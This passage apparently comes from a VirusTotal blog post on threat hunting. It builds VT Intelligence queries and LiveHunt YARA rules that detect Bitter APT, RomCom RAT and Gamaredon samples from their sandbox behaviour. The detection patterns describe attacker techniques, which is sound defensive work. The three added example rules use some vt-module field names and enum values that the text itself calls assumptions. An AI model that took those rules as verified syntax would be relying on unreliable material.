<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/EEI-fSDUkMivxfRbrnfyDK9dp3cZVRxsfaZ2vTs6OEWbkv6QQcbKTRo69-BwXy0bg0r8jhQok_hQgW07CHIltbLS0N245DICvVqggB2XXdJXy6lTbmzfAxY_4y_4ibESIAlBsPQoGkNAYVrP2u3b_ZyjLYE9PzbvImiY3h4tQ-oLjxeiQIg1BjwcMV7oc_E" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/collection/alienvault_627ce58306cce7d0a5ae037a" target="_blank">https://www.virustotal.com/gui/collection/alienvault_627ce58306cce7d0a5ae037a</a></small>
</figcaption></div></span></div>
<div class="interval_12"> You can also search for what the community is discussing about this APT directly by searching on community comments. For example, the next query returns samples related to Bitter APT.
</div>
<div class="my-yara-code interval_12">
<mark class="red">entity:</mark>file <mark class="red">comment:</mark>"Bitter APT"
</div>
<br />
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/m_wq4BM0pDRWrlNdLv9gEptjGdSJwgrF9cKTI_-SShLiGIJJtU5slNi4S5XEBodF9AJlfjAEtUk_Skus9ShZiKkzSDGBsVG9NmoV5-bqkBRrUJ83NRD458PtoKTd9sI5EHJyeLMJRocrtwhfddadPOcrIMsf3vCCDxnVVZLDEW_TfL-w7IgkJRrEil4Ugj8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> When checking these samples’ behaviour we find patterns that can be used to hunt for similar ones. For instance, Bitter appears to favour the "chm" file format, as seen in the initial Twitter/X reference and when computing Commonalities among these files, together with scheduled tasks for persistence on the targeted systems: the scheduled task runs the %comspec% environment variable to launch msiexec.exe followed by a URL.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M62zF1Vs8_ptjKNOGTtyiL6Va5V9P-Eob1DSW-HOQJuGeU6HV8o5MkipQdmd7Dqj4TYcT0rm6NSkteCqs8XtkV8lHHdptMugKJOedl2tcVDtXOElmMLwADhnMWKm32Gac_A2iU-s3V9vJD-OzM3IJPoB2abx3pWTtiPO3q6uHv5G2DYtjJxhTN4zRC9U3gM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> All these behavioral characteristics will help us create good LiveHunt rules and queries to detect additional samples. For example: </div>
<div class="my-yara-code interval_12">
<mark class="red">behavior_processes:</mark>"%Comspec%" <mark class="red">behavior_processes:</mark>"schtasks.exe" <mark class="red">tag:</mark>chm
</div>
<div class="interval_12"> The query returns 39 different samples, most of them apparently related to Bitter based on behavior similarities.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/cKPDGPBWj1O_4m4H5KU_V51PVKOsdi2_qBB61bJa1Hc3-kRULZBUXq9SXaOoOoYkZowWqI9yxpsODBthu0pZGZYJ3fGlxh3-_rF4S6pWD2Hob2-mkjnZewKoDhTjzuNEYaUd_FSHgIpkS4h9rGbHluV0Sx3jIt_v82mcY6oJMMwiT1Pdpxs33DiIaq-udso" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Now it's time to translate our query into a LiveHunt rule. Certain functionalities available for VTI queries are not ready (yet) in VT LiveHunt and vice versa. We are working to maximize the integration between both systems, and we will get back with more details as we progress in this.
</div>
<div class="interval_12"> As we published, <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">we can create a LiveHunt rule from a sample by simply clicking</a> - we are going to create a rule based on 7829b84b5e415ff682f3ef06b9a80f64be5ef6d1d2508597f9e0998b91114499.
</div>
<div class="interval_12"> First, we are interested in identifying the use of the process “schtasks.exe” during sample detonation. In the behaviour details of this sample, we can find “schtasks.exe” in the “Process Tree” and “Shell Commands” sections.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M92XaRkOAiet-pb75lNFooPes07RnXo-Q6u_5wfV3qaWaAXwXU6yfvbeDzfk6CsWLaQ4DeYc4L6GxrLu_MOGt4Oc4OMRxcdV5FeP-cdH9nLqFZUZ4VFjoVtDcRQOzCW_DjB2ggB07I_8I2AQC8uv4xN9goQkiYYkqLigDg6kVx66zSyChohSMiaEnGlNtQI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> At the moment, it is not possible to use "Process Tree" in LiveHunt rules, however we can search for processes in "Shell Commands" and "Processes Created" sections to start creating the logic of our rule. In future updates, we will integrate more fields to be used in the creation of LiveHunt YARA rules.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/a_UEKs9DtErUtoS1TMxI0VzqC8LzjgmwLw5cJ569yNLnhj-I4LTpmiAaswSTFHS5Jt9Z_jBQn4v3xLA_JfGM_01SdKW8Nm0FyTtoXgkx7LC4NP4FBbMAg9NS_FxeMHTjzBLofUZlO2E7scqRUJbNllKNM76cNP5DgG4iEjga29mYrl3tFPe8d7t4vZErd4w" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> There is no "Processes Created" section, probably because the sandboxes were unable to extract that information. That does not mean it will be the same for future uploads, so we add both the "Shell Commands" and "Processes Created" fields to the condition.
</div>
<div class="interval_12"> We will follow the same steps to detect the use of the environment variable “%comspec%” in the command line during detonation.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/NctSJiXm9VggIcAipIOwZHzeXQljRo5yYAyqJS-T6esIidFUuHEWM8tugKlJE14dSkauZu2-kAQ2wVUd-_0rapqtYrQrIAQOG4tAoo_cnxiQ1hFNtWKS2kY-FTkYXKM1YX5dlzkI0PftZ4K4PNyBHSFGTei17vcKpJPoJyt9oGZEVVfxQJ25EEvBPzeWoEc" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">We look for the same information in the two sections (shell commands and processes) and in two different ways, because Bitter mixed upper and lower case letters to spell %coMSPec%. We can simplify this with the "<b>icontains</b>" operator, which makes the comparison case-insensitive.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/_P1Y-YULr9bLIHMEo4swRxB41d7FT_EissX0RUic3qaKp2EHz4y7SRW03lNFn7M-Xmv4kpaseYQil0BmCywS1c8cAojSXaNf632js-QOa3Ruz96c0quyW3Ap4Riy4Z_tDGtHTQaT2aq4zDbM2tSVr9WdT1da9hlwU-NfnbEOqkkVKGvl30tSV2Zdpi_BELw" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Finally, we want to add two extra conditions. The first is that samples carry the "chm" tag, since that is the format we are looking for. The second is to get notifications exclusively for newly uploaded files.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/xnqLYCYC3n430YGUeCbJR5kzpuF_icI-JaFOhNUVDJgFz9kVBZEe4edYafh34SiRqTI0GFxgPWQ78kGyWd-rKrCQCcyE5ZTQSlQwnKL8w0AOZiv9UNBSk7-wvCWticihEkHH1TbNEadRSqIeQcwGrJvemMuufIsgWK1kBj0kmFjXa4CFkNkwqILZWT4NZz8" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">And that’s it! You can download and use this YARA rule <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/APT_Bitter_chm_files.yar" target="_blank">from our public GitHub</a>, to be integrated into our Crowdsourced YARA Hub in the future.
</div>
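<div class="interval_12">The four conditions walked through above (shell commands or created processes, case-insensitive %comspec%, the "chm" tag, new files only) written out as one LiveHunt rule. This is an added example and not the rule published in VirusTotal's GitHub repository; the vt module field names follow the module documentation linked in the references at the end of this post, and the rule name and description are arbitrary choices.</div>

```yara
import "vt"

// Added example (not the rule from VirusTotal's GitHub): the Bitter CHM logic
// described above, expressed against the vt module. Field names are taken
// from the vt module documentation; the rule name is an arbitrary choice.
rule Example_Bitter_CHM_comspec
{
  meta:
    description = "New CHM files whose detonation runs a command through %comspec%"
  condition:
    // only notify on files uploaded after the rule is deployed
    vt.metadata.new_file and
    // restrict to the CHM format through the "chm" tag
    for any tag in vt.metadata.tags : ( tag == "chm" ) and
    // icontains makes the match case-insensitive, so %coMSPec% and %COMSPEC% both hit;
    // both the shell-command and the process-creation fields are checked because a
    // sandbox may populate only one of them for a given sample
    (
      for any cmd in vt.behaviour.command_executions : ( cmd icontains "%comspec%" ) or
      for any proc in vt.behaviour.processes_created : ( proc icontains "%comspec%" )
    )
}
```

<div class="interval_12">Keeping both behaviour fields in an "or" costs nothing and covers the case seen above, where a sandbox report has shell commands but no "Processes Created" section.</div>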
<div class="interval_12"> <b>RomCom RAT</b> </div>
<div class="interval_12">The BlackBerry Threat Research and Intelligence team <a href="https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine" target="_blank">published</a> a report on the targeting of politicians in Ukraine with the RomCom RAT. During the campaign, the threat actors used a trojanized version of <a href="https://devolutions.net/" target="_blank">Remote Desktop Manager</a>.
</div>
<div class="interval_12"> Taking a look at the behavior of the samples provided in this publication, we can find interesting behavioral indicators to generate a VTI query.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/we5_73gr29xkc39_N97jMqyhGg9xQ-LD9EVMqm9CxEsKosrKgWmU9CKe_rpsI3CuRPA2selIsjyDhg3faRgtoMRSqkOr66HbZ7sFjYdYy0gudtcRmjrJW0p009X4WSYlcxRb_07wO1aXbQTD841JyZafr4-_GohVhR0w9igAj1UCPQxK0YaWhcfdwTzTitg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Different samples related to RomCom RAT seem to usually drop DLL files in the path “C:\Users\Public\Libraries” with different extensions, and execute them using “rundll32.exe”. That means there are also file creation events in the same path.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WnS5hrMuLYbWxv7QqsJLJux2QS9ewWa0QlkhR5WzQlp6rwttOFKKPkJecM-iXxZ9mti0HzztgUUxKrdTTSHcNVZHU21W2h5EtJNebMedU21KU-63o_pu5_8AF_zZgKeRjLp42ZskiBsZbIp7kOC2lgILspjfaMwCazwPD_o2EEpH5kHQs2aDuzlIMtxazuI" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> All of these indicators, along with others used by RomCom RAT in different intrusions, can be used to create a potential query that can later be translated into a LiveHunt.
</div>
<div class="interval_12">These samples export up to three different functions:
</div>
<div class="interval_12">
<ul>
<li>fwdTst</li>
<li>#1</li>
<li>Main</li>
</ul>
</div>
<div class="interval_12">“Main” is probably the most common export name, shared by many legitimate DLLs, so we will ignore it. The VTI query we use is as follows:
</div>
<div class="my-yara-code interval_12">
((<mark class="red">behavior_processes:</mark>".dll,fwdTst") OR (<mark class="red">behavior_processes:</mark>"dll\",#1" <mark class="red">behavior_processes:</mark>"\\Public\\Libraries\\") OR (<mark class="red">behavior_processes:</mark>*.dll0* <mark class="red">behavior_processes:</mark>"\\Public\\Libraries\\")) AND ((<mark class="red">behavior_files:</mark>*\\Public\\Libraries\\*) AND (<mark class="red">behavior:</mark>*rundll32.exe*))
</div>
<div class="interval_12"> Even if you did not know that "Main" is a common DLL export, building the query would reveal a large number of samples matching the logic. For this reason, before creating a rule it is important to run a query, when possible, to check whether the results align with our expectations, and to iterate on the condition until we are satisfied with it.
</div>
<div class="interval_12"> The last query provides samples related both to RomCom RAT and Mustang Panda. This might indicate that both threat actors are using similar procedures during their campaigns.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/DeyxF0jA7zPEie3j6FpuSnLgxahkITfPRvMRz5Q554idYOR9hxwUgkG4MJ0tdsdveI4AcBJ-1OOC8o815JcYSi9BeQkzinw96JlgwNhNniaI5iWK0-i8QotfH2u7IA1ibavr1p9taYwnbWcgVAlOduyyKCmW7cxHekn77RmWj77hcT_VX_DTj9T1217CQvM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> To convert this query to LiveHunt, we will split the original query into different sections and adapt them to the rule. As previously explained, the rule will be slightly different from the original query for compatibility reasons.
</div>
<div class="interval_12">
<ol>
<li>First, we only want DLL, EXE or MSI files.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/sctuSgay4Vr3Q2N3V9Wnvo6IjKl6YuohwfX0Nux0xbrCmJFRp8N9k50Mo8AJ5QLdd7YPm-BuGp3uq8DJe2Az1FqjJUmGD5aZqJRjGPjyQ4H248dAvGKfkY4Iq2D8KwqABY4bHyUjpgnwp7icd6XKy1v67I7C2CAp7hCXfJh_xJ9MMtmLa_nzIlCf2QuS5Wk" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>As a precaution to minimize false positives, we want to skip samples that are not detected as malicious by AntiVirus vendors.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/WzUPHv3i-xWsccYds632RMLbFALAe_j6ObS-aEN9OL6vd7SneiwS4PO-oE2t7YrN2wrOBRuDNGD5bQJd_1RYpxahjxBMB0dsuW3kma1hW0O5a8V_9KFF01ubWnL40RHii7mdebEyiE0juDbw5DsSsp5zV44GEPKYfjZsOyzkprARQIDuq_F49RO93bnS40k" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Something we cannot do in VT Intelligence queries is single out file write activity: the VTI behavior_files modifier performs a generic search for a literal across all file activity (creation, modification, writing, deletion, etc.). LiveHunt is more precise and lets us restrict the search to files written during detonation.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/oO4zcB4x_2hNKYpuCEaBCyaMDKpGa5pKIm-1KCUrN-_jS0htanfhdIsMNTFoPykxreJkM4Uf_JQHNj9--Vy7LDfq7GiwwBxy4OSVEi3poYBCe5QKxMj5QQbx4Hr1cOVhIz99ZYUgYaRyjyu0dKtbulqb6czxFOQYOI2OOIMF-GR7olRjNAYTCvkeagzYGug" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>rundll32.exe appears during execution because the dropped DLL is loaded through it as part of the sample's process. We will search for it in different fields.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/A_DnpvkSgnTecLh0N13l4qtFANQI8YQtNRVBfNcNJGT91i8Y-NZes5VgmIIhkHM4CMF2zKFX5lVifb6Es9StnzNmYBS-dnPypKtJxKHUxw-570JLt64Bv-tt8PNUkzZZrgBP84maehxs-SdcYD2kcwL7kEAHlBdmKJ7d8r5UmMyLRDXMwck-9890INxUg2Q" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Finally, we are interested in the functions exported by the observed DLLs, which appear in the command lines. We are also interested in the presence of a .DLL extension, which indicates some type of activity involving libraries.</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/bLo40XaWzwUOyju0nBabMDETwgvp_FwON8JGJMsLaPqPeBit1aQN0fTrKmO5mchvMXQpFN7f6R8TAcywzrR0jRLp9EO5z-jvOop2pamDZNh5wvHWkojhJzVQUYr5hfRPayg6kHx9BkJOfy0TK106nPLK-8e2qYP6VjqD7TNz2w02ZdrV0L7Z489njdAflT4" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
</ol>
</div>
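<div class="interval_12">The five steps above combined into one LiveHunt rule, added here as an example; it is not the rule from VirusTotal's repository. The file-type enum values (vt.FileType.PE_DLL, vt.FileType.PE_EXE), the "msi" tag name, the detection threshold and the rule name are assumptions based on the vt module documentation; the export names, the drop path and rundll32.exe come from the VTI query above.</div>

```yara
import "vt"

// Added example (not VirusTotal's published rule): the RomCom / Public\Libraries
// logic from the five steps above. Enum values, the "msi" tag and the threshold
// are assumptions taken from the vt module documentation.
rule Example_RomCom_PublicLibraries_rundll32
{
  meta:
    description = "PE/MSI samples that write a library under C:\\Users\\Public\\Libraries and run it via rundll32.exe"
  condition:
    // 1. only DLL, EXE or MSI files
    (
      vt.metadata.file_type == vt.FileType.PE_DLL or
      vt.metadata.file_type == vt.FileType.PE_EXE or
      for any tag in vt.metadata.tags : ( tag == "msi" )
    ) and
    // 2. skip samples that no engine flags as malicious (false-positive guard)
    vt.metadata.analysis_stats.malicious > 0 and
    // 3. a file actually written (not merely opened or deleted) under Public\Libraries;
    //    VTI's behavior_files cannot make this distinction, files_written can
    for any path in vt.behaviour.files_written : ( path icontains "\\Public\\Libraries\\" ) and
    // 4. rundll32.exe seen either as a created process or in an executed command line
    (
      for any proc in vt.behaviour.processes_created : ( proc icontains "rundll32.exe" ) or
      for any cmd in vt.behaviour.command_executions : ( cmd icontains "rundll32.exe" )
    ) and
    // 5. a .dll reference plus one of the observed exports in the command line;
    //    "Main" is deliberately left out because too many legitimate DLLs export it
    for any cmd in vt.behaviour.command_executions : (
      cmd icontains ".dll" and ( cmd icontains ",fwdTst" or cmd icontains ",#1" )
    )
}
```

<div class="interval_12">If the rule turns out to be too narrow, step 5 is the first place to relax it, for instance by dropping the export names and keeping only the ".dll" check, exactly as the VTI query does in its third branch.</div>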
<div class="interval_12">You can also find this rule in <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/RomCom_MustangPanda_Similar_Behaviors.yar" target="_blank">our public GitHub</a> repository. Feel free to modify it based on your needs!</div>
<div class="interval_12"> <b>Gamaredon</b> </div>
<div class="interval_12">Our last example is related to the Gamaredon threat actor. As per <a href="https://attack.mitre.org/groups/G0047/" target="_blank">MITRE</a> “Gamaredon Group is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine”.
</div>
<div class="interval_12"> This threat actor commonly uses the <a href="https://attack.mitre.org/techniques/T1221/" target="_blank">remote template</a> injection technique, which involves connecting to a remote resource to load a malicious template. The external domains used to host the template generally follow some URL pattern. According to <a href="https://blog.talosintelligence.com/gamaredon-apt-targets-ukrainian-agencies/" target="_blank">publications</a> from different vendors, this actor usually registers domains under the “.ru” TLD.
</div>
<div class="interval_12"> Gamaredon also uses the “DavSetCookie” function of the DLL “davclnt.dll”. This behavior is flagged as possibly related to exfiltration or to the use of WebDAV to launch code; here it is used to load the remote template. We can quickly check this with the following query:
</div>
<div class="my-yara-code interval_12">
<mark class="red">threat_actor:</mark>"Gamaredon Group" <mark class="red">behavior:</mark>"DavSetCookie"
</div>
<div class="interval_12">Putting all this information together, we can build the following VT Intelligence query to get samples related to Gamaredon:
</div>
<div class="my-yara-code interval_12">
(<mark class="red">behavior_processes:</mark>*.ru* and <mark class="red">behavior_processes:</mark>*DavSetCookie* and <mark class="red">behavior_processes:</mark>*http*) and (<mark class="red">behavior_network:</mark>*.ru* or <mark class="red">embedded_domain:</mark>*.ru* or <mark class="red">embedded_url:</mark>*.ru*) (<mark class="red">type:</mark>document)
</div>
<div class="interval_12"> The query is designed to find files of type document in which the following strings are found, either during execution or embedded in the file:
</div>
<div class="interval_12"><u>Behavior_processes:</u> </div>
<div class="interval_12">
<ul>
<li>First we want to identify the use of the string “.ru” in the command line. This will be related to domains with this TLD.
</li>
<li>Another string that we want to match in the command line is “DavSetCookie”, since it was used by Gamaredon to accomplish remote template loading.
</li>
<li>Finally the string “http” must be in the command line as well.
</li>
</ul>
</div>
<div class="interval_12"><u>Behavior_network:</u> </div>
<div class="interval_12">
<ul>
<li>See if there are communications <b>established</b> with domains having the “.ru” TLD.
</li>
</ul>
</div>
<div class="interval_12"><u>Embedded_domain:</u> </div>
<div class="interval_12">
<ul>
<li>Domains embedded within the document containing the TLD “.ru”. <b>It is not necessary that a connection has existed</b>. We do it this way in case our sandboxes have had problems communicating or the sample has simply decided not to communicate.
</li>
</ul>
</div>
<div class="interval_12"> <u>Embedded_url:</u> </div>
<div class="interval_12">
<ul>
<li>URLs embedded within the document containing the TLD “.ru”. <b>It is not necessary that a connection has existed</b>. We do it this way in case our sandboxes have had problems communicating or the sample has simply decided not to communicate.
</li>
</ul>
</div>
<div class="interval_12"><div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/BDBa-WEi1yjbov31H-twWFtDKzRyy8hW3vtUJd01Zo3diDYWJDAEGkrCguEHt4d7dmJ-x3QEO_QtRM_175ZI2B5QdaPDxHCfWNwTTC2yDuEJqcq3-KUpb4iAQDJouaVGMsdEXF3GK_XkpZBWmL8xY0EubHr-2HBXtxoiiknenECIiqnbYn5BQ_a9lkvnNN4" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div> </div>
<div class="interval_12"> This VT Intelligence query returns results that seem consistent with known Gamaredon samples, based on the patterns discussed above. False positives among the results are always possible.
</div>
<div class="interval_12"> Let's convert this VT intelligence query to a LiveHunt to receive notifications for new interesting files.
</div>
<div class="interval_12">
<ol>
<li>First, we want to make sure the exported DLL function name is found in any command line or process-related behavior, together with traces of the “.ru” TLD in HTTP communication. We look for the TLD ".ru" and the string "http" in the command lines because the connection may never have been established even though there was an intention to establish it.
</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/jtGak9FnAyJi2WyuGF-kd0TsA9ARcaA4OhnxFrUnChV1_7V1j9nFmhHzPgFxM-lMQ8FKA6LkfB93rbHcfvfN4O_qN4vcfpeTVQryfuoN_sShAPc8s-mqutTjc_7gBGAzvqbZp1Z4fq_vsIWl6i4guOLSvw8rYMopRgQvdujveZdIDvfpNmrawXWFLOLQQ60" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>Communications are important, so we need to check whether connections were established with domains under the .ru TLD. Remember that the next block will match only if communications actually took place.
</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/l0K2ZjSk3gJsf0kjsf4VSTfh3vWMxUfmIP2ORoX-sl_LlwtP9QPgKDFqYSVxmKEqw2WTW4RVdSYJn5eisoRAcX5OfjTDYI4sGK97zUz90uve0DysE9UTY5EgI9UFs3wzRVkFWFdd8TfTRcLiIeh6xcvQ5BRcOeDRmRN1kDeMfl3GXymz-9ePDkfHxF2xIHM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<li>And for this example, we are just interested in document files, although you can change it to any other file type to adapt it to your needs.
</li>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/4EstLZ7MVpGBCB4iD417qIE_-d1HxQYArAX7Fw6wee7gcGb1v7oKZbPS7Gsxjki1ygTmrSRZWl2e5TAK81yJNkFLATcFlE2idgeT-eK9CBMkdezpbe9IQmwTTN_OzPNsnaXvZdWo6Pkt_MpGR2sekcGRE3JzHbsNtHzUNei-rKYqEFhNny6OumswGFXw4f0" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
</ol>
</div>
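<div class="interval_12">The three LiveHunt steps above assembled into one rule, added here as an example; it is not the rule from VirusTotal's repository linked below. The document file-type enum values (vt.FileType.DOC, DOCX, RTF) and the rule name are assumptions based on the vt module documentation; "DavSetCookie", the ".ru" TLD and "http" come from the VTI query above.</div>

```yara
import "vt"

// Added example (not VirusTotal's published rule): the Gamaredon remote-template
// logic from the three steps above. Enum values for document types are an
// assumption taken from the vt module documentation.
rule Example_Gamaredon_Documents_DavSetCookie_RU
{
  meta:
    description = "Documents whose detonation calls DavSetCookie against a .ru host over HTTP and actually contacts a .ru domain"
  condition:
    // 1. the exported function, the TLD and "http" in a command line or a created
    //    process: this part matches even when the connection itself never succeeded
    (
      for any cmd in vt.behaviour.command_executions : (
        cmd icontains "DavSetCookie" and cmd icontains ".ru" and cmd icontains "http"
      ) or
      for any proc in vt.behaviour.processes_created : (
        proc icontains "DavSetCookie" and proc icontains ".ru" and proc icontains "http"
      )
    ) and
    // 2. evidence that communication with a .ru domain was established, either as a
    //    DNS lookup or as an HTTP conversation; this block fails if the sandbox had
    //    no network or the sample chose not to talk
    (
      for any lookup in vt.behaviour.dns_lookups : ( lookup.hostname iendswith ".ru" ) or
      for any conv in vt.behaviour.http_conversations : ( conv.url icontains ".ru/" )
    ) and
    // 3. documents only; swap these for other types to adapt the rule
    (
      vt.metadata.file_type == vt.FileType.DOC or
      vt.metadata.file_type == vt.FileType.DOCX or
      vt.metadata.file_type == vt.FileType.RTF
    )
}
```

<div class="interval_12">Block 2 is the strict counterpart of the VTI query's embedded_domain and embedded_url branches: the query tolerates a sample that never connected, the rule above does not. Dropping block 2 brings the rule closer to the query at the price of more false positives.</div>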
<div class="interval_12">As usual, you can find and download the YARA rule in <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/Gamaredon_Documents_DavSetCookie_RU.yar" target="_blank">our public repository</a>.
</div>
<h2 style="text-align: left;">Current limitations
</h2>
<div class="interval_12"> We are aware of the limitations that currently exist when translating fields from VT Intelligence queries to LiveHunt rules and vice versa, and we are working to obtain maximum compatibility between both systems. For the moment, however, this can be an advantage, as the two complement each other.
</div>
<div class="interval_12"> VTI modifiers such as behavior_processes, behavior_created_processes or even behavior are somewhat more generic than what LiveHunt currently offers, which lets us specify whether we want information about processes created, processes terminated, or commands executed.
</div>
<div class="interval_12"> However, something that cannot be used yet in LiveHunt rules is the process tree. On some occasions the dynamic executions of our sandboxes only offer information at the process tree level, which means that this information is not available to our rules. If you want to search for information within the process tree with VT Intelligence queries, you can use the “behavior” file modifier, which does cover the process tree.
</div>
<h2 style="text-align: left;">Wrapping up
</h2>
<div class="interval_12"> Converting VT intelligence queries to LiveHunt rules is getting easier. The recently added "<a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">structure</a>" feature in LiveHunt allows creating rules in a much simpler way by clicking on the interesting fields, creating the rule conditions for you and eliminating the need to know all available fields in the VT module.
</div>
<div class="interval_12"> This post describes, with examples, an approach that analysts might use for their hunting and monitoring. In particular, using VT Intelligence queries before starting to work on a YARA rule is very helpful during the initial fine-tuning stage of the condition. This practice minimizes noise and ensures we get quality results before we move to the LiveHunt rule. Finally, a good VTI query can be translated into a YARA rule with just a few minor changes.
</div>
